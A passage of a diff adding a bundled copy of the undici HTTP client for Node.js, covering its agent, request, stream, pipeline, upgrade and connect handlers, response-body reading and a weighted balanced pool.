InvalidArgumentError('opts.origin must be a non-empty string or URL.') + } + + const ref = this[kClients].get(key) + + let dispatcher = ref ? 
ref.deref() : null + if (!dispatcher) { + dispatcher = this[kFactory](opts.origin, this[kOptions]) + .on('drain', this[kOnDrain]) + .on('connect', this[kOnConnect]) + .on('disconnect', this[kOnDisconnect]) + .on('connectionError', this[kOnConnectionError]) + + this[kClients].set(key, new WeakRef(dispatcher)) + this[kFinalizer].register(dispatcher, key) + } + + return dispatcher.dispatch(opts, handler) + } + + async [kClose] () { + const closePromises = [] + for (const ref of this[kClients].values()) { + const client = ref.deref() + /* istanbul ignore else: gc is undeterministic */ + if (client) { + closePromises.push(client.close()) + } + } + + await Promise.all(closePromises) + } + + async [kDestroy] (err) { + const destroyPromises = [] + for (const ref of this[kClients].values()) { + const client = ref.deref() + /* istanbul ignore else: gc is undeterministic */ + if (client) { + destroyPromises.push(client.destroy(err)) + } + } + + await Promise.all(destroyPromises) + } +} + +module.exports = Agent + + +/***/ }), + +/***/ 7032: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const { addAbortListener } = __nccwpck_require__(3983) +const { RequestAbortedError } = __nccwpck_require__(8045) + +const kListener = Symbol('kListener') +const kSignal = Symbol('kSignal') + +function abort (self) { + if (self.abort) { + self.abort() + } else { + self.onError(new RequestAbortedError()) + } +} + +function addSignal (self, signal) { + self[kSignal] = null + self[kListener] = null + + if (!signal) { + return + } + + if (signal.aborted) { + abort(self) + return + } + + self[kSignal] = signal + self[kListener] = () => { + abort(self) + } + + addAbortListener(self[kSignal], self[kListener]) +} + +function removeSignal (self) { + if (!self[kSignal]) { + return + } + + if ('removeEventListener' in self[kSignal]) { + self[kSignal].removeEventListener('abort', self[kListener]) + } else { + self[kSignal].removeListener('abort', self[kListener]) + } + + 
self[kSignal] = null + self[kListener] = null +} + +module.exports = { + addSignal, + removeSignal +} + + +/***/ }), + +/***/ 9744: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { AsyncResource } = __nccwpck_require__(852) +const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { addSignal, removeSignal } = __nccwpck_require__(7032) + +class ConnectHandler extends AsyncResource { + constructor (opts, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + const { signal, opaque, responseHeaders } = opts + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + super('UNDICI_CONNECT') + + this.opaque = opaque || null + this.responseHeaders = responseHeaders || null + this.callback = callback + this.abort = null + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders () { + throw new SocketError('bad connect', null) + } + + onUpgrade (statusCode, rawHeaders, socket) { + const { callback, opaque, context } = this + + removeSignal(this) + + this.callback = null + + let headers = rawHeaders + // Indicates is an HTTP2Session + if (headers != null) { + headers = this.responseHeaders === 'raw' ? 
util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + } + + this.runInAsyncScope(callback, null, null, { + statusCode, + headers, + socket, + opaque, + context + }) + } + + onError (err) { + const { callback, opaque } = this + + removeSignal(this) + + if (callback) { + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + } +} + +function connect (opts, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + connect.call(this, opts, (err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + try { + const connectHandler = new ConnectHandler(opts, callback) + this.dispatch({ ...opts, method: 'CONNECT' }, connectHandler) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = connect + + +/***/ }), + +/***/ 8752: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + Readable, + Duplex, + PassThrough +} = __nccwpck_require__(2781) +const { + InvalidArgumentError, + InvalidReturnValueError, + RequestAbortedError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { AsyncResource } = __nccwpck_require__(852) +const { addSignal, removeSignal } = __nccwpck_require__(7032) +const assert = __nccwpck_require__(9491) + +const kResume = Symbol('resume') + +class PipelineRequest extends Readable { + constructor () { + super({ autoDestroy: true }) + + this[kResume] = null + } + + _read () { + const { [kResume]: resume } = this + + if (resume) { + this[kResume] = null + resume() + } + } + + _destroy (err, callback) { + this._read() + + callback(err) + } +} + +class PipelineResponse extends Readable { + constructor (resume) { + super({ autoDestroy: true }) + this[kResume] = resume + } + + _read () { + this[kResume]() + } + + _destroy (err, callback) { + if 
(!err && !this._readableState.endEmitted) { + err = new RequestAbortedError() + } + + callback(err) + } +} + +class PipelineHandler extends AsyncResource { + constructor (opts, handler) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (typeof handler !== 'function') { + throw new InvalidArgumentError('invalid handler') + } + + const { signal, method, opaque, onInfo, responseHeaders } = opts + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + if (method === 'CONNECT') { + throw new InvalidArgumentError('invalid method') + } + + if (onInfo && typeof onInfo !== 'function') { + throw new InvalidArgumentError('invalid onInfo callback') + } + + super('UNDICI_PIPELINE') + + this.opaque = opaque || null + this.responseHeaders = responseHeaders || null + this.handler = handler + this.abort = null + this.context = null + this.onInfo = onInfo || null + + this.req = new PipelineRequest().on('error', util.nop) + + this.ret = new Duplex({ + readableObjectMode: opts.objectMode, + autoDestroy: true, + read: () => { + const { body } = this + + if (body && body.resume) { + body.resume() + } + }, + write: (chunk, encoding, callback) => { + const { req } = this + + if (req.push(chunk, encoding) || req._readableState.destroyed) { + callback() + } else { + req[kResume] = callback + } + }, + destroy: (err, callback) => { + const { body, req, res, ret, abort } = this + + if (!err && !ret._readableState.endEmitted) { + err = new RequestAbortedError() + } + + if (abort && err) { + abort() + } + + util.destroy(body, err) + util.destroy(req, err) + util.destroy(res, err) + + removeSignal(this) + + callback(err) + } + }).on('prefinish', () => { + const { req } = this + + // Node < 15 does not call _final in same tick. 
+ req.push(null) + }) + + this.res = null + + addSignal(this, signal) + } + + onConnect (abort, context) { + const { ret, res } = this + + assert(!res, 'pipeline cannot be retried') + + if (ret.destroyed) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders (statusCode, rawHeaders, resume) { + const { opaque, handler, context } = this + + if (statusCode < 200) { + if (this.onInfo) { + const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + this.onInfo({ statusCode, headers }) + } + return + } + + this.res = new PipelineResponse(resume) + + let body + try { + this.handler = null + const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + body = this.runInAsyncScope(handler, null, { + statusCode, + headers, + opaque, + body: this.res, + context + }) + } catch (err) { + this.res.on('error', util.nop) + throw err + } + + if (!body || typeof body.on !== 'function') { + throw new InvalidReturnValueError('expected Readable') + } + + body + .on('data', (chunk) => { + const { ret, body } = this + + if (!ret.push(chunk) && body.pause) { + body.pause() + } + }) + .on('error', (err) => { + const { ret } = this + + util.destroy(ret, err) + }) + .on('end', () => { + const { ret } = this + + ret.push(null) + }) + .on('close', () => { + const { ret } = this + + if (!ret._readableState.ended) { + util.destroy(ret, new RequestAbortedError()) + } + }) + + this.body = body + } + + onData (chunk) { + const { res } = this + return res.push(chunk) + } + + onComplete (trailers) { + const { res } = this + res.push(null) + } + + onError (err) { + const { ret } = this + this.handler = null + util.destroy(ret, err) + } +} + +function pipeline (opts, handler) { + try { + const pipelineHandler = new PipelineHandler(opts, handler) + this.dispatch({ ...opts, body: pipelineHandler.req }, pipelineHandler) + return 
pipelineHandler.ret + } catch (err) { + return new PassThrough().destroy(err) + } +} + +module.exports = pipeline + + +/***/ }), + +/***/ 5448: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Readable = __nccwpck_require__(3858) +const { + InvalidArgumentError, + RequestAbortedError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) +const { AsyncResource } = __nccwpck_require__(852) +const { addSignal, removeSignal } = __nccwpck_require__(7032) + +class RequestHandler extends AsyncResource { + constructor (opts, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError, highWaterMark } = opts + + try { + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + if (highWaterMark && (typeof highWaterMark !== 'number' || highWaterMark < 0)) { + throw new InvalidArgumentError('invalid highWaterMark') + } + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + if (method === 'CONNECT') { + throw new InvalidArgumentError('invalid method') + } + + if (onInfo && typeof onInfo !== 'function') { + throw new InvalidArgumentError('invalid onInfo callback') + } + + super('UNDICI_REQUEST') + } catch (err) { + if (util.isStream(body)) { + util.destroy(body.on('error', util.nop), err) + } + throw err + } + + this.responseHeaders = responseHeaders || null + this.opaque = opaque || null + this.callback = callback + this.res = null + this.abort = null + this.body = body + this.trailers = {} + this.context = null + this.onInfo = onInfo || null + this.throwOnError = throwOnError + this.highWaterMark = highWaterMark + + if (util.isStream(body)) { + 
body.on('error', (err) => { + this.onError(err) + }) + } + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders (statusCode, rawHeaders, resume, statusMessage) { + const { callback, opaque, abort, context, responseHeaders, highWaterMark } = this + + const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + + if (statusCode < 200) { + if (this.onInfo) { + this.onInfo({ statusCode, headers }) + } + return + } + + const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers + const contentType = parsedHeaders['content-type'] + const body = new Readable({ resume, abort, contentType, highWaterMark }) + + this.callback = null + this.res = body + if (callback !== null) { + if (this.throwOnError && statusCode >= 400) { + this.runInAsyncScope(getResolveErrorBodyCallback, null, + { callback, body, contentType, statusCode, statusMessage, headers } + ) + } else { + this.runInAsyncScope(callback, null, null, { + statusCode, + headers, + trailers: this.trailers, + opaque, + body, + context + }) + } + } + } + + onData (chunk) { + const { res } = this + return res.push(chunk) + } + + onComplete (trailers) { + const { res } = this + + removeSignal(this) + + util.parseHeaders(trailers, this.trailers) + + res.push(null) + } + + onError (err) { + const { res, callback, body, opaque } = this + + removeSignal(this) + + if (callback) { + // TODO: Does this need queueMicrotask? + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + + if (res) { + this.res = null + // Ensure all queued handlers are invoked before destroying res. 
+ queueMicrotask(() => { + util.destroy(res, err) + }) + } + + if (body) { + this.body = null + util.destroy(body, err) + } + } +} + +function request (opts, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + request.call(this, opts, (err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + try { + this.dispatch(opts, new RequestHandler(opts, callback)) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = request +module.exports.RequestHandler = RequestHandler + + +/***/ }), + +/***/ 5395: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { finished, PassThrough } = __nccwpck_require__(2781) +const { + InvalidArgumentError, + InvalidReturnValueError, + RequestAbortedError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) +const { AsyncResource } = __nccwpck_require__(852) +const { addSignal, removeSignal } = __nccwpck_require__(7032) + +class StreamHandler extends AsyncResource { + constructor (opts, factory, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError } = opts + + try { + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + if (typeof factory !== 'function') { + throw new InvalidArgumentError('invalid factory') + } + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + if (method === 'CONNECT') { + throw new InvalidArgumentError('invalid method') + } + + if (onInfo && typeof onInfo !== 'function') { + throw new 
InvalidArgumentError('invalid onInfo callback') + } + + super('UNDICI_STREAM') + } catch (err) { + if (util.isStream(body)) { + util.destroy(body.on('error', util.nop), err) + } + throw err + } + + this.responseHeaders = responseHeaders || null + this.opaque = opaque || null + this.factory = factory + this.callback = callback + this.res = null + this.abort = null + this.context = null + this.trailers = null + this.body = body + this.onInfo = onInfo || null + this.throwOnError = throwOnError || false + + if (util.isStream(body)) { + body.on('error', (err) => { + this.onError(err) + }) + } + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders (statusCode, rawHeaders, resume, statusMessage) { + const { factory, opaque, context, callback, responseHeaders } = this + + const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + + if (statusCode < 200) { + if (this.onInfo) { + this.onInfo({ statusCode, headers }) + } + return + } + + this.factory = null + + let res + + if (this.throwOnError && statusCode >= 400) { + const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers + const contentType = parsedHeaders['content-type'] + res = new PassThrough() + + this.callback = null + this.runInAsyncScope(getResolveErrorBodyCallback, null, + { callback, body: res, contentType, statusCode, statusMessage, headers } + ) + } else { + if (factory === null) { + return + } + + res = this.runInAsyncScope(factory, null, { + statusCode, + headers, + opaque, + context + }) + + if ( + !res || + typeof res.write !== 'function' || + typeof res.end !== 'function' || + typeof res.on !== 'function' + ) { + throw new InvalidReturnValueError('expected Writable') + } + + // TODO: Avoid finished. It registers an unnecessary amount of listeners. 
+ finished(res, { readable: false }, (err) => { + const { callback, res, opaque, trailers, abort } = this + + this.res = null + if (err || !res.readable) { + util.destroy(res, err) + } + + this.callback = null + this.runInAsyncScope(callback, null, err || null, { opaque, trailers }) + + if (err) { + abort() + } + }) + } + + res.on('drain', resume) + + this.res = res + + const needDrain = res.writableNeedDrain !== undefined + ? res.writableNeedDrain + : res._writableState && res._writableState.needDrain + + return needDrain !== true + } + + onData (chunk) { + const { res } = this + + return res ? res.write(chunk) : true + } + + onComplete (trailers) { + const { res } = this + + removeSignal(this) + + if (!res) { + return + } + + this.trailers = util.parseHeaders(trailers) + + res.end() + } + + onError (err) { + const { res, callback, opaque, body } = this + + removeSignal(this) + + this.factory = null + + if (res) { + this.res = null + util.destroy(res, err) + } else if (callback) { + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + + if (body) { + this.body = null + util.destroy(body, err) + } + } +} + +function stream (opts, factory, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + stream.call(this, opts, factory, (err, data) => { + return err ? 
reject(err) : resolve(data) + }) + }) + } + + try { + this.dispatch(opts, new StreamHandler(opts, factory, callback)) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = stream + + +/***/ }), + +/***/ 6923: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) +const { AsyncResource } = __nccwpck_require__(852) +const util = __nccwpck_require__(3983) +const { addSignal, removeSignal } = __nccwpck_require__(7032) +const assert = __nccwpck_require__(9491) + +class UpgradeHandler extends AsyncResource { + constructor (opts, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + const { signal, opaque, responseHeaders } = opts + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + super('UNDICI_UPGRADE') + + this.responseHeaders = responseHeaders || null + this.opaque = opaque || null + this.callback = callback + this.abort = null + this.context = null + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = null + } + + onHeaders () { + throw new SocketError('bad upgrade', null) + } + + onUpgrade (statusCode, rawHeaders, socket) { + const { callback, opaque, context } = this + + assert.strictEqual(statusCode, 101) + + removeSignal(this) + + this.callback = null + const headers = this.responseHeaders === 'raw' ? 
util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + this.runInAsyncScope(callback, null, null, { + headers, + socket, + opaque, + context + }) + } + + onError (err) { + const { callback, opaque } = this + + removeSignal(this) + + if (callback) { + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + } +} + +function upgrade (opts, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + upgrade.call(this, opts, (err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + try { + const upgradeHandler = new UpgradeHandler(opts, callback) + this.dispatch({ + ...opts, + method: opts.method || 'GET', + upgrade: opts.protocol || 'Websocket' + }, upgradeHandler) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = upgrade + + +/***/ }), + +/***/ 4059: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +module.exports.request = __nccwpck_require__(5448) +module.exports.stream = __nccwpck_require__(5395) +module.exports.pipeline = __nccwpck_require__(8752) +module.exports.upgrade = __nccwpck_require__(6923) +module.exports.connect = __nccwpck_require__(9744) + + +/***/ }), + +/***/ 3858: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +// Ported from https://github.com/nodejs/undici/pull/907 + + + +const assert = __nccwpck_require__(9491) +const { Readable } = __nccwpck_require__(2781) +const { RequestAbortedError, NotSupportedError, InvalidArgumentError } = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { ReadableStreamFrom, toUSVString } = __nccwpck_require__(3983) + +let Blob + +const kConsume = Symbol('kConsume') +const kReading = Symbol('kReading') +const kBody = Symbol('kBody') +const kAbort = Symbol('abort') 
+const kContentType = Symbol('kContentType') + +const noop = () => {} + +module.exports = class BodyReadable extends Readable { + constructor ({ + resume, + abort, + contentType = '', + highWaterMark = 64 * 1024 // Same as nodejs fs streams. + }) { + super({ + autoDestroy: true, + read: resume, + highWaterMark + }) + + this._readableState.dataEmitted = false + + this[kAbort] = abort + this[kConsume] = null + this[kBody] = null + this[kContentType] = contentType + + // Is stream being consumed through Readable API? + // This is an optimization so that we avoid checking + // for 'data' and 'readable' listeners in the hot path + // inside push(). + this[kReading] = false + } + + destroy (err) { + if (this.destroyed) { + // Node < 16 + return this + } + + if (!err && !this._readableState.endEmitted) { + err = new RequestAbortedError() + } + + if (err) { + this[kAbort]() + } + + return super.destroy(err) + } + + emit (ev, ...args) { + if (ev === 'data') { + // Node < 16.7 + this._readableState.dataEmitted = true + } else if (ev === 'error') { + // Node < 16 + this._readableState.errorEmitted = true + } + return super.emit(ev, ...args) + } + + on (ev, ...args) { + if (ev === 'data' || ev === 'readable') { + this[kReading] = true + } + return super.on(ev, ...args) + } + + addListener (ev, ...args) { + return this.on(ev, ...args) + } + + off (ev, ...args) { + const ret = super.off(ev, ...args) + if (ev === 'data' || ev === 'readable') { + this[kReading] = ( + this.listenerCount('data') > 0 || + this.listenerCount('readable') > 0 + ) + } + return ret + } + + removeListener (ev, ...args) { + return this.off(ev, ...args) + } + + push (chunk) { + if (this[kConsume] && chunk !== null && this.readableLength === 0) { + consumePush(this[kConsume], chunk) + return this[kReading] ? 
super.push(chunk) : true + } + return super.push(chunk) + } + + // https://fetch.spec.whatwg.org/#dom-body-text + async text () { + return consume(this, 'text') + } + + // https://fetch.spec.whatwg.org/#dom-body-json + async json () { + return consume(this, 'json') + } + + // https://fetch.spec.whatwg.org/#dom-body-blob + async blob () { + return consume(this, 'blob') + } + + // https://fetch.spec.whatwg.org/#dom-body-arraybuffer + async arrayBuffer () { + return consume(this, 'arrayBuffer') + } + + // https://fetch.spec.whatwg.org/#dom-body-formdata + async formData () { + // TODO: Implement. + throw new NotSupportedError() + } + + // https://fetch.spec.whatwg.org/#dom-body-bodyused + get bodyUsed () { + return util.isDisturbed(this) + } + + // https://fetch.spec.whatwg.org/#dom-body-body + get body () { + if (!this[kBody]) { + this[kBody] = ReadableStreamFrom(this) + if (this[kConsume]) { + // TODO: Is this the best way to force a lock? + this[kBody].getReader() // Ensure stream is locked. + assert(this[kBody].locked) + } + } + return this[kBody] + } + + dump (opts) { + let limit = opts && Number.isFinite(opts.limit) ? opts.limit : 262144 + const signal = opts && opts.signal + + if (signal) { + try { + if (typeof signal !== 'object' || !('aborted' in signal)) { + throw new InvalidArgumentError('signal must be an AbortSignal') + } + util.throwIfAborted(signal) + } catch (err) { + return Promise.reject(err) + } + } + + if (this.closed) { + return Promise.resolve(null) + } + + return new Promise((resolve, reject) => { + const signalListenerCleanup = signal + ? 
util.addAbortListener(signal, () => { + this.destroy() + }) + : noop + + this + .on('close', function () { + signalListenerCleanup() + if (signal && signal.aborted) { + reject(signal.reason || Object.assign(new Error('The operation was aborted'), { name: 'AbortError' })) + } else { + resolve(null) + } + }) + .on('error', noop) + .on('data', function (chunk) { + limit -= chunk.length + if (limit <= 0) { + this.destroy() + } + }) + .resume() + }) + } +} + +// https://streams.spec.whatwg.org/#readablestream-locked +function isLocked (self) { + // Consume is an implicit lock. + return (self[kBody] && self[kBody].locked === true) || self[kConsume] +} + +// https://fetch.spec.whatwg.org/#body-unusable +function isUnusable (self) { + return util.isDisturbed(self) || isLocked(self) +} + +async function consume (stream, type) { + if (isUnusable(stream)) { + throw new TypeError('unusable') + } + + assert(!stream[kConsume]) + + return new Promise((resolve, reject) => { + stream[kConsume] = { + type, + stream, + resolve, + reject, + length: 0, + body: [] + } + + stream + .on('error', function (err) { + consumeFinish(this[kConsume], err) + }) + .on('close', function () { + if (this[kConsume].body !== null) { + consumeFinish(this[kConsume], new RequestAbortedError()) + } + }) + + process.nextTick(consumeStart, stream[kConsume]) + }) +} + +function consumeStart (consume) { + if (consume.body === null) { + return + } + + const { _readableState: state } = consume.stream + + for (const chunk of state.buffer) { + consumePush(consume, chunk) + } + + if (state.endEmitted) { + consumeEnd(this[kConsume]) + } else { + consume.stream.on('end', function () { + consumeEnd(this[kConsume]) + }) + } + + consume.stream.resume() + + while (consume.stream.read() != null) { + // Loop + } +} + +function consumeEnd (consume) { + const { type, body, resolve, stream, length } = consume + + try { + if (type === 'text') { + resolve(toUSVString(Buffer.concat(body))) + } else if (type === 'json') { + 
resolve(JSON.parse(Buffer.concat(body))) + } else if (type === 'arrayBuffer') { + const dst = new Uint8Array(length) + + let pos = 0 + for (const buf of body) { + dst.set(buf, pos) + pos += buf.byteLength + } + + resolve(dst.buffer) + } else if (type === 'blob') { + if (!Blob) { + Blob = (__nccwpck_require__(4300).Blob) + } + resolve(new Blob(body, { type: stream[kContentType] })) + } + + consumeFinish(consume) + } catch (err) { + stream.destroy(err) + } +} + +function consumePush (consume, chunk) { + consume.length += chunk.length + consume.body.push(chunk) +} + +function consumeFinish (consume, err) { + if (consume.body === null) { + return + } + + if (err) { + consume.reject(err) + } else { + consume.resolve() + } + + consume.type = null + consume.stream = null + consume.resolve = null + consume.reject = null + consume.length = 0 + consume.body = null +} + + +/***/ }), + +/***/ 7474: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const assert = __nccwpck_require__(9491) +const { + ResponseStatusCodeError +} = __nccwpck_require__(8045) +const { toUSVString } = __nccwpck_require__(3983) + +async function getResolveErrorBodyCallback ({ callback, body, contentType, statusCode, statusMessage, headers }) { + assert(body) + + let chunks = [] + let limit = 0 + + for await (const chunk of body) { + chunks.push(chunk) + limit += chunk.length + if (limit > 128 * 1024) { + chunks = null + break + } + } + + if (statusCode === 204 || !contentType || !chunks) { + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) + return + } + + try { + if (contentType.startsWith('application/json')) { + const payload = JSON.parse(toUSVString(Buffer.concat(chunks))) + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? 
`: ${statusMessage}` : ''}`, statusCode, headers, payload)) + return + } + + if (contentType.startsWith('text/')) { + const payload = toUSVString(Buffer.concat(chunks)) + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers, payload)) + return + } + } catch (err) { + // Process in a fallback if error + } + + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) +} + +module.exports = { getResolveErrorBodyCallback } + + +/***/ }), + +/***/ 7931: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + BalancedPoolMissingUpstreamError, + InvalidArgumentError +} = __nccwpck_require__(8045) +const { + PoolBase, + kClients, + kNeedDrain, + kAddClient, + kRemoveClient, + kGetDispatcher +} = __nccwpck_require__(3198) +const Pool = __nccwpck_require__(4634) +const { kUrl, kInterceptors } = __nccwpck_require__(2785) +const { parseOrigin } = __nccwpck_require__(3983) +const kFactory = Symbol('factory') + +const kOptions = Symbol('options') +const kGreatestCommonDivisor = Symbol('kGreatestCommonDivisor') +const kCurrentWeight = Symbol('kCurrentWeight') +const kIndex = Symbol('kIndex') +const kWeight = Symbol('kWeight') +const kMaxWeightPerServer = Symbol('kMaxWeightPerServer') +const kErrorPenalty = Symbol('kErrorPenalty') + +function getGreatestCommonDivisor (a, b) { + if (b === 0) return a + return getGreatestCommonDivisor(b, a % b) +} + +function defaultFactory (origin, opts) { + return new Pool(origin, opts) +} + +class BalancedPool extends PoolBase { + constructor (upstreams = [], { factory = defaultFactory, ...opts } = {}) { + super() + + this[kOptions] = opts + this[kIndex] = -1 + this[kCurrentWeight] = 0 + + this[kMaxWeightPerServer] = this[kOptions].maxWeightPerServer || 100 + this[kErrorPenalty] = 
this[kOptions].errorPenalty || 15 + + if (!Array.isArray(upstreams)) { + upstreams = [upstreams] + } + + if (typeof factory !== 'function') { + throw new InvalidArgumentError('factory must be a function.') + } + + this[kInterceptors] = opts.interceptors && opts.interceptors.BalancedPool && Array.isArray(opts.interceptors.BalancedPool) + ? opts.interceptors.BalancedPool + : [] + this[kFactory] = factory + + for (const upstream of upstreams) { + this.addUpstream(upstream) + } + this._updateBalancedPoolStats() + } + + addUpstream (upstream) { + const upstreamOrigin = parseOrigin(upstream).origin + + if (this[kClients].find((pool) => ( + pool[kUrl].origin === upstreamOrigin && + pool.closed !== true && + pool.destroyed !== true + ))) { + return this + } + const pool = this[kFactory](upstreamOrigin, Object.assign({}, this[kOptions])) + + this[kAddClient](pool) + pool.on('connect', () => { + pool[kWeight] = Math.min(this[kMaxWeightPerServer], pool[kWeight] + this[kErrorPenalty]) + }) + + pool.on('connectionError', () => { + pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) + this._updateBalancedPoolStats() + }) + + pool.on('disconnect', (...args) => { + const err = args[2] + if (err && err.code === 'UND_ERR_SOCKET') { + // decrease the weight of the pool. 
+ pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) + this._updateBalancedPoolStats() + } + }) + + for (const client of this[kClients]) { + client[kWeight] = this[kMaxWeightPerServer] + } + + this._updateBalancedPoolStats() + + return this + } + + _updateBalancedPoolStats () { + this[kGreatestCommonDivisor] = this[kClients].map(p => p[kWeight]).reduce(getGreatestCommonDivisor, 0) + } + + removeUpstream (upstream) { + const upstreamOrigin = parseOrigin(upstream).origin + + const pool = this[kClients].find((pool) => ( + pool[kUrl].origin === upstreamOrigin && + pool.closed !== true && + pool.destroyed !== true + )) + + if (pool) { + this[kRemoveClient](pool) + } + + return this + } + + get upstreams () { + return this[kClients] + .filter(dispatcher => dispatcher.closed !== true && dispatcher.destroyed !== true) + .map((p) => p[kUrl].origin) + } + + [kGetDispatcher] () { + // We validate that pools is greater than 0, + // otherwise we would have to wait until an upstream + // is added, which might never happen. + if (this[kClients].length === 0) { + throw new BalancedPoolMissingUpstreamError() + } + + const dispatcher = this[kClients].find(dispatcher => ( + !dispatcher[kNeedDrain] && + dispatcher.closed !== true && + dispatcher.destroyed !== true + )) + + if (!dispatcher) { + return + } + + const allClientsBusy = this[kClients].map(pool => pool[kNeedDrain]).reduce((a, b) => a && b, true) + + if (allClientsBusy) { + return + } + + let counter = 0 + + let maxWeightIndex = this[kClients].findIndex(pool => !pool[kNeedDrain]) + + while (counter++ < this[kClients].length) { + this[kIndex] = (this[kIndex] + 1) % this[kClients].length + const pool = this[kClients][this[kIndex]] + + // find pool index with the largest weight + if (pool[kWeight] > this[kClients][maxWeightIndex][kWeight] && !pool[kNeedDrain]) { + maxWeightIndex = this[kIndex] + } + + // decrease the current weight every `this[kClients].length`. 
